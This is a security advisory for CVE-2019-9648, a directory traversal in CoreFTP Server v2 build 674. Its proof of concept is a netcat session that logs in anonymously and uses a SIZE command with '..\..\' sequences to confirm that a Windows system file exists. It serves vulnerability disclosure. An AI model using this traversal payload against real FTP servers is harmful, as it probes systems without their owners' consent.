CoreFTP Server FTP / SFTP Server 2 Build 674 SIZE Directory Traversal

CoreFTP Server FTP and SFTP Server version 2 build 674 suffer from a directory traversal vulnerability. By utilizing a directory traversal along with the FTP SIZE command, an attacker can browse outside the root directory to determine if a file exists based on return file size by using a ..\..\ technique.


MD5 | bf05bbc2220c263ad1f75377d9581155

CVE-2019-9648

CoreFTP Server FTP / SFTP Server v2 - Build 674 SIZE Directory Traversal

Discovered By: Kevin Randall

Summary: By utilizing a directory traversal along with the FTP SIZE
command, an attacker can browse outside the root directory to determine if
a file exists based on return file size by using a ..\..\ technique

Tools used:

Parrot OS VM

Windows 7 VM

FTP / SFTP Server v2 - Build 674

Netcat



Proof of Concept (PoC):



File 1: ARP.exe

Type of file: Application(.EXE)

Description: TCP/IP Arp Command

Location: C:\Windows\System32\

Size: 20.5 KB (20,992 bytes)

Size on disk: 24.0 KB (24,576 bytes)

Created: Monday July 13, 2009 7:55:11 PM

Modified: Monday July 13, 2009, 9:14:12 PM

Accessed: Monday July 13, 2009 7:55:11 PM



#nc -nv 192.168.0.2 21

(UNKNOWN) [192.168.0.2] 21 (ftp) open

220 Core FTP Server Version 2.0, build 674, 32-bit, installed 1 days ago
Unregistered

USER anonymous

331 password required for anonymous

PASS anonymous@

230-Logged on

230

SIZE C:\..\..\..\..\..\..\Windows\System32\ARP.exe

213 20992



Related Posts